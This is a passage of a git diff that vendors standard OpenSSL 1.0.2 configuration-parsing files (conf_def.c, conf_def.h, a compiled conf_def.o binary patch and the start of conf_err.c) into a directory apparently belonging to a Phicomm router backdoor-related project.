+            if (*from == q)
+                from++;
+        } else if (IS_DQUOTE(conf, *from)) {
+            q = *from;
+            from++;
+            while (!IS_EOF(conf, *from)) {
+                if (*from == q) {
+                    if (*(from + 1) == q) {
+                        from++;
+                    } else {
+                        break;
+                    }
+                }
+                buf->data[to++] = *(from++);
+            }
+            if (*from == q)
+                from++;
+        } else if (IS_ESC(conf, *from)) {
+            from++;
+            v = *(from++);
+            if (IS_EOF(conf, v))
+                break;
+            else if (v == 'r')
+                v = '\r';
+            else if (v == 'n')
+                v = '\n';
+            else if (v == 'b')
+                v = '\b';
+            else if (v == 't')
+                v = '\t';
+            buf->data[to++] = v;
+        } else if (IS_EOF(conf, *from))
+            break;
+        else if (*from == '$') {
+            /* try to expand it */
+            rrp = NULL;
+            s = &(from[1]);
+            if (*s == '{')
+                q = '}';
+            else if (*s == '(')
+                q = ')';
+            else
+                q = 0;
+
+            if (q)
+                s++;
+            cp = section;
+            e = np = s;
+            while (IS_ALPHA_NUMERIC(conf, *e))
+                e++;
+            if ((e[0] == ':') && (e[1] == ':')) {
+                cp = np;
+                rrp = e;
+                rr = *e;
+                *rrp = '\0';
+                e += 2;
+                np = e;
+                while (IS_ALPHA_NUMERIC(conf, *e))
+                    e++;
+            }
+            r = *e;
+            *e = '\0';
+            rp = e;
+            if (q) {
+                if (r != q) {
+                    CONFerr(CONF_F_STR_COPY, CONF_R_NO_CLOSE_BRACE);
+                    goto err;
+                }
+                e++;
+            }
+            /*-
+             * So at this point we have
+             * np which is the start of the name string which is
+             *   '\0' terminated.
+             * cp which is the start of the section string which is
+             *   '\0' terminated.
+             * e is the 'next point after'.
+             * r and rr are the chars replaced by the '\0'
+             * rp and rrp is where 'r' and 'rr' came from.
+             */
+            p = _CONF_get_string(conf, cp, np);
+            if (rrp != NULL)
+                *rrp = rr;
+            *rp = r;
+            if (p == NULL) {
+                CONFerr(CONF_F_STR_COPY, CONF_R_VARIABLE_HAS_NO_VALUE);
+                goto err;
+            }
+            BUF_MEM_grow_clean(buf, (strlen(p) + buf->length - (e - from)));
+            while (*p)
+                buf->data[to++] = *(p++);
+
+            /*
+             * Since we change the pointer 'from', we also have to change the
+             * perceived length of the string it points at.  /RL
+             */
+            len -= e - from;
+            from = e;
+
+            /*
+             * In case there were no braces or parenthesis around the
+             * variable reference, we have to put back the character that was
+             * replaced with a '\0'.  /RL
+             */
+            *rp = r;
+        } else
+            buf->data[to++] = *(from++);
+    }
+    buf->data[to] = '\0';
+    if (*pto != NULL)
+        OPENSSL_free(*pto);
+    *pto = buf->data;
+    OPENSSL_free(buf);
+    return (1);
+ err:
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    return (0);
+}
+
+static char *eat_ws(CONF *conf, char *p)
+{
+    while (IS_WS(conf, *p) && (!IS_EOF(conf, *p)))
+        p++;
+    return (p);
+}
+
+static char *eat_alpha_numeric(CONF *conf, char *p)
+{
+    for (;;) {
+        if (IS_ESC(conf, *p)) {
+            p = scan_esc(conf, p);
+            continue;
+        }
+        if (!IS_ALPHA_NUMERIC_PUNCT(conf, *p))
+            return (p);
+        p++;
+    }
+}
+
+static char *scan_quote(CONF *conf, char *p)
+{
+    int q = *p;
+
+    p++;
+    while (!(IS_EOF(conf, *p)) && (*p != q)) {
+        if (IS_ESC(conf, *p)) {
+            p++;
+            if (IS_EOF(conf, *p))
+                return (p);
+        }
+        p++;
+    }
+    if (*p == q)
+        p++;
+    return (p);
+}
+
+static char *scan_dquote(CONF *conf, char *p)
+{
+    int q = *p;
+
+    p++;
+    while (!(IS_EOF(conf, *p))) {
+        if (*p == q) {
+            if (*(p + 1) == q) {
+                p++;
+            } else {
+                break;
+            }
+        }
+        p++;
+    }
+    if (*p == q)
+        p++;
+    return (p);
+}
+
+static void dump_value_doall_arg(CONF_VALUE *a, BIO *out)
+{
+    if (a->name)
+        BIO_printf(out, "[%s] %s=%s\n", a->section, a->name, a->value);
+    else
+        BIO_printf(out, "[[%s]]\n", a->section);
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(dump_value, CONF_VALUE, BIO)
+
+static int def_dump(const CONF *conf, BIO *out)
+{
+    lh_CONF_VALUE_doall_arg(conf->data, LHASH_DOALL_ARG_FN(dump_value),
+                            BIO, out);
+    return 1;
+}
+
+static int def_is_number(const CONF *conf, char c)
+{
+    return IS_NUMBER(conf, c);
+}
+
+static int def_to_int(const CONF *conf, char c)
+{
+    return c - '0';
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.h
new file mode 100644
index 0000000..7d897b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.h
@@ -0,0 +1,181 @@
+/* crypto/conf/conf_def.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * THIS FILE WAS AUTOMAGICALLY GENERATED! Please modify and use keysets.pl to
+ * regenerate it.
+ */
+
+#define CONF_NUMBER             1
+#define CONF_UPPER              2
+#define CONF_LOWER              4
+#define CONF_UNDER              256
+#define CONF_PUNCTUATION        512
+#define CONF_WS                 16
+#define CONF_ESC                32
+#define CONF_QUOTE              64
+#define CONF_DQUOTE             1024
+#define CONF_COMMENT            128
+#define CONF_FCOMMENT           2048
+#define CONF_EOF                8
+#define CONF_HIGHBIT            4096
+#define CONF_ALPHA              (CONF_UPPER|CONF_LOWER)
+#define CONF_ALPHA_NUMERIC      (CONF_ALPHA|CONF_NUMBER|CONF_UNDER)
+#define CONF_ALPHA_NUMERIC_PUNCT (CONF_ALPHA|CONF_NUMBER|CONF_UNDER| \
+                                        CONF_PUNCTUATION)
+
+#define KEYTYPES(c)             ((unsigned short *)((c)->meth_data))
+#ifndef CHARSET_EBCDIC
+# define IS_COMMENT(c,a)         (KEYTYPES(c)[(a)&0xff]&CONF_COMMENT)
+# define IS_FCOMMENT(c,a)        (KEYTYPES(c)[(a)&0xff]&CONF_FCOMMENT)
+# define IS_EOF(c,a)             (KEYTYPES(c)[(a)&0xff]&CONF_EOF)
+# define IS_ESC(c,a)             (KEYTYPES(c)[(a)&0xff]&CONF_ESC)
+# define IS_NUMBER(c,a)          (KEYTYPES(c)[(a)&0xff]&CONF_NUMBER)
+# define IS_WS(c,a)              (KEYTYPES(c)[(a)&0xff]&CONF_WS)
+# define IS_ALPHA_NUMERIC(c,a)   (KEYTYPES(c)[(a)&0xff]&CONF_ALPHA_NUMERIC)
+# define IS_ALPHA_NUMERIC_PUNCT(c,a) \
+                                (KEYTYPES(c)[(a)&0xff]&CONF_ALPHA_NUMERIC_PUNCT)
+# define IS_QUOTE(c,a)           (KEYTYPES(c)[(a)&0xff]&CONF_QUOTE)
+# define IS_DQUOTE(c,a)          (KEYTYPES(c)[(a)&0xff]&CONF_DQUOTE)
+# define IS_HIGHBIT(c,a)         (KEYTYPES(c)[(a)&0xff]&CONF_HIGHBIT)
+
+#else                           /* CHARSET_EBCDIC */
+
+# define IS_COMMENT(c,a)         (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_COMMENT)
+# define IS_FCOMMENT(c,a)        (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_FCOMMENT)
+# define IS_EOF(c,a)             (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_EOF)
+# define IS_ESC(c,a)             (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_ESC)
+# define IS_NUMBER(c,a)          (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_NUMBER)
+# define IS_WS(c,a)              (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_WS)
+# define IS_ALPHA_NUMERIC(c,a)   (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_ALPHA_NUMERIC)
+# define IS_ALPHA_NUMERIC_PUNCT(c,a) \
+                                (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_ALPHA_NUMERIC_PUNCT)
+# define IS_QUOTE(c,a)           (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_QUOTE)
+# define IS_DQUOTE(c,a)          (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_DQUOTE)
+# define IS_HIGHBIT(c,a)         (KEYTYPES(c)[os_toascii[a]&0xff]&CONF_HIGHBIT)
+#endif                          /* CHARSET_EBCDIC */
+
+static unsigned short CONF_type_default[256] = {
+    0x0008, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+    0x0000, 0x0010, 0x0010, 0x0000, 0x0000, 0x0010, 0x0000, 0x0000,
+    0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+    0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+    0x0010, 0x0200, 0x0040, 0x0080, 0x0000, 0x0200, 0x0200, 0x0040,
+    0x0000, 0x0000, 0x0200, 0x0200, 0x0200, 0x0200, 0x0200, 0x0200,
+    0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
+    0x0001, 0x0001, 0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x0200,
+    0x0200, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002,
+    0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002,
+    0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002,
+    0x0002, 0x0002, 0x0002, 0x0000, 0x0020, 0x0000, 0x0200, 0x0100,
+    0x0040, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004,
+    0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004,
+    0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004,
+    0x0004, 0x0004, 0x0004, 0x0000, 0x0200, 0x0000, 0x0200, 0x0000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+};
+
+static unsigned short CONF_type_win32[256] = {
+    0x0008, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+    0x0000, 0x0010, 0x0010, 0x0000, 0x0000, 0x0010, 0x0000, 0x0000,
+    0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+    0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+    0x0010, 0x0200, 0x0400, 0x0000, 0x0000, 0x0200, 0x0200, 0x0000,
+    0x0000, 0x0000, 0x0200, 0x0200, 0x0200, 0x0200, 0x0200, 0x0200,
+    0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
+    0x0001, 0x0001, 0x0000, 0x0A00, 0x0000, 0x0000, 0x0000, 0x0200,
+    0x0200, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002,
+    0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002,
+    0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002, 0x0002,
+    0x0002, 0x0002, 0x0002, 0x0000, 0x0000, 0x0000, 0x0200, 0x0100,
+    0x0000, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004,
+    0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004,
+    0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004, 0x0004,
+    0x0004, 0x0004, 0x0004, 0x0000, 0x0200, 0x0000, 0x0200, 0x0000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+    0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000, 0x1000,
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.o
new file mode 100644
index 0000000000000000000000000000000000000000..349661a29d65680ed885bf722bb2e33764de4318
GIT binary patch
literal 11016
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
Q2WVrVi1Wwn&G!F)0=ct=2mk;8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.c
new file mode 100644
index 0000000..bb5e2fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.c
@@ -0,0 +1,133 @@
+/* crypto/conf/conf_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
